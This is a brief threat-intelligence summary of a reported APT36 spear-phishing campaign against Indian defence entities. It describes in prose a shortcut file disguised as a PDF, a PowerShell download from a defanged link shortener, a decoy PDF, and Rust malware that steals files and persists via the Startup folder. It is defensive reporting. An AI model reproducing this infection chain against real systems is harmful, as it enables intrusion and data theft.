According to a Seqrite report released on 21 December 2023, beginning in October 2023, Indian government entities, particularly those engaged in defense, have been targeted with a novel Rust-written malware.
The delivery mechanism is consistent with spear-phishing with documents and lures mimicking various Indian government agencies, especially defense-related branches. The observed attachment is a Windows shortcut file named “IPR_2023-24” disguised as a PDF.
Upon opening the malicious shortcut file, PowerShell is activated to download and execute a script from the link shortener rb[.]gy using Invoke-WebRequest. This PowerShell script establishes URL paths for subsequent stage payloads, leading to the placement of a decoy PDF file in the Documents folder. When this decoy PDF file is accessed, it initiates the extraction of an archive containing a Rust-compiled binary with the EXE extension. The Rust-compiled binary then conducts a check on basic system information and proceeds to upload logs to a counterfeit domain.
Persistence is established through the Startup directory for the final payload, which is another Rust-based malware with the objective of stealing files, collecting system information, and uploading both individual files and logs to a specified domain.
Based on victimology and TTPs overlap, the campaign has been attributed to APT36, a threat actor believed to be sponsored by the Pakistani government, primarily targeting Indian government entities.